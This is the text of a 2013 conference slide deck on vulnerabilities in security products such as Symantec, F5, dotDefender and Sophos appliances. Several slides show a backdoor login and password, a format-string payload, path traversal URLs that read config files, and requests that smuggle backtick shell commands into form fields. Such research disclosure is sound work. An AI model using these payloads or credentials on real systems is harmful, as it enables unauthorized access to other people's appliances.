Insecurity software

Insecurity Software PHDays 2013 Version: 1.0 Author: Alexander Antukh Responsible:
Alexander Antukh Date: 24.05.2013 Confidentiality: Public

© 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved
Agenda •  Introduction •  What is Security Software •  Historical review •  The Question •  The Answer •  Vuln, where art thou? •  Afterword •  QA 2

SEC Consult – Who we are Canada India Singapore SEC Consult Office SEC Consult Headquarter Other SEC Consult Clients Lithuania Germany Austria Central and Easter Europe •  Leading international application security consultancy •  Founded 2002 •  Headquarters near Vienna, Austria •  Delivery Centers in Austria, Germany, Lithuania and Singapore •  Strong customer base in Central and Eastern Europe •  Increasing customer base of clients with global business (esp. out of Top-10 US and European software vendors) •  35+ application security experts •  Industry focus banks, software vendors, government USA 3

Alexander Antukh – Whoami •  Security consultant •  Offensive Security Certified Expert •  Defcon Moscow Local Group Coordinator *kidhacker 4

What is Security Software “A generic term referring to any computer program or library which purpose is to (help to) secure a computer system or a computer network” 6

What is Security Software 7 The keyword in all the security software is…

What is Security Software 8

What is Security Software 9 In other words, SS is a piece of “anti-evil” software which makes you feel safe and “anti-bad”

Historical review Evolution: Packet filter Stateful FW App layer FW First appearance: 1988 First *registered* exploit: 1995 Objective: control network traffic and determine if it’s good enough to pass Firewall 11

Historical review First appearance: 1986 First *registered* hack: 1999 Objective: monitor for malicious activities or policy violations (heuristics, signatures...) ID(P)S Ceci n‘est pas un firewall... ü Statistical anomaly-based ü Signature-based 12 ü Passive (detection) ü Reactive (prevention)

Historical review AntiSpam evolution: Del First appearance: Monty Python First PoC: 1978 Industrial scale: 1994 - ... CAN-SPAM Act of 2003: spam is legal Keywords Blacklists Auth Protocol analysis Filtering 13

14 Historical review First registered hack: 1903 (OSVDB-ID: 79399, 79400) Anti-sniffing “… I did it for the lulz” Today it’s net configuration, encryption and IDS/IPS Nevil Maskelyne

15 Historical review First „viruses“: 1971 First viruses: mid-1980s First AVs: mid-1980s (CHK4BOMB, BOMBSQUAD, DRPROTECT) Virus evolution: Benign Destructive $$$$$ Anti-virus

16 Historical review AV companies don’t stand still…

17 Historical review … neither do other SS products

18 Agenda •  Introduction •  What is Security Software •  Historical review •  The Question •  The Answer •  Vuln, where art thou? •  Afterward •  QA

19 The question Do you know anybody less boring? What if the SS is vulnerable itself?

20 The answer *sorry for my English

21 Déjà vu (slide from PHDays 2012) •  Reverse engineering •  Checkpoint – Client side remote command execution Multiple Checkpoint appliances CVE-2011-1827 •  Fuzzing •  F5 Firepass – Remote command execution F5 FirePass SSL VPN – Remote command execution CVE-2012-1777 •  Application testing •  Microsoft ASP.Net – Authentication bypass Microsoft Security Bulletin MS11-100 - Critical Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2638420) CVE-2011-3416 Security software products will be the target of the trade ... soon !

22 The time has come!

The answer •  Symantec Messaging Gateway •  Backdoor by design Code execution •  F5 BIG-IP •  SQL Injection, XXE Passwords… Root access •  Applicure dotDefender WAF •  Format string vulnerability Code execution •  Sophos Web Protection Appliance •  LFI, OS Command Injection Command execution, admin account pwn Security software products are the target of the trade ... already! 23

The answer “... inbound and outbound messaging security, with effective and accurate real-time antispam and antivirus protection, advanced content filtering, data loss prevention, and email encryption ...“ Symantec Messaging Gateway v.9.5.x SSH?! Remote shell! Login: support MD5: 52e3bbafc627009ac13caff1200a0dbf Password: symantec 24

The answer F5 BIG-IP <= 11.2.0 “... from load balancing and service offloading to acceleration and security, the BIG-IP system delivers agility—and ensures your applications are fast, secure, and available ...“ 25

The answer “... from load balancing and service offloading to acceleration and security, the BIG-IP system delivers agility—and ensures your applications are fast, secure, and available ...“ sam/admin/reports/php/getSettings.php à 26 F5 BIG-IP <= 11.2.0

The answer “... dotDefender is a web application security solution (a Web Application Firewall, or WAF) that offers strong, proactive security for your websites and web applications ...“ Web Attack? 27 AppliCure dotDefender WAF <= 4.26

28 The answer •  %MAILTO_BLOCK% - email entered in the “Email address for blocked request report” field •  %RID% - reference ID •  %IP% - server's IP address •  %DATE_TIME% - date of blocked request Error page can be configured in different ways: Vars to be added to the body of a custom page: Looks nice… AppliCure dotDefender WAF <= 4.26

29 The answer Format string injection •  Variables •  Buffer •  ... •  AP_PRINTF() check for format string vulnerabilities … should be <%IP%> Host: … Algorithm: %666d\xBA\xAD\xBE\xEF… AppliCure dotDefender WAF <= 4.26

30 The answer “... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non- technical users...“ Sophos Web Protection Appliance <= 3.7.8.1 https://<host>/cgi-bin/patience.cgi?id=.. ?id=../../persist/config/shared.conf%00 ?id=../../log/ui_access_log%00 "https://<host>/index.php? section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e29880767781 53" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0" Passwords!

31 The answer ` POST /index.php?c=diagnostic_tools HTTP/1.1 ... action=wget&section=configuration&STYLE=<validsessid>&url=%60sle ep%205%60 Diagnostic Tools “... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non- technical users...“ Sophos Web Protection Appliance <= 3.7.8.1

32 The answer ` https://<host>/end-user/index.php?reason=application&client- ip=%20%60sleep+10%60 Block page (%%user_workstation%%“) “... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non- technical users...“ Sophos Web Protection Appliance <= 3.7.8.1

33 The answer POST /index.php?c=local_site_list_editor HTTP/1.1 ... STYLE=<validsessid>&action=save&entries=[{"url"%3a+".'`sleep+10`'", +"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}] Local Site List ` “... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non- technical users...“ Sophos Web Protection Appliance <= 3.7.8.1

34 The answer Sophos Web Protection Appliance <= 3.7.8.1

35 Agenda •  Introduction •  What is Security Software •  Historical review •  The Question •  The Answer •  Vuln, where art thou? •  Afterword •  QA

Vuln, where art thou? •  Methods for identifying usable bugs in “Software products” •  Applicaton testing and Fuzzing •  Reverse engineering •  Source code analysis •  A short note on so called “security scanning” tools 36

Vuln, where art thou? •  The workflow for the appliance analysis is pretty simple! •  get a virtual appliance demo version •  install the appliance •  add the .vmdk to another vm and mount it there (or use a linux fs driver that can mount vmdk files) •  add a new user to /etc/passwd, or change UID/shell/password of existing users (or maybe change the sudoers file, sshd config) •  start the appliance again and log in :) •  look at the services that are running (and their configuration) •  pwnage ;) 37

Vuln, where art thou? *Move two matches to make it three equal squares 38

39 Start me up! Vuln, where art thou?

40 Agenda •  Introduction •  What is Security Software •  Historical review •  The Question •  The Answer •  Vuln, where art thou? •  Afterword •  QA

41 Sometimes it’s easier to find the vulnerability than it might be expected . . . *doesn’t exist yet And now for something completely different

QA

Insecurity software

Insecurity software

More Decks by Alexander Antukh

Other Decks in Research

Featured

Transcript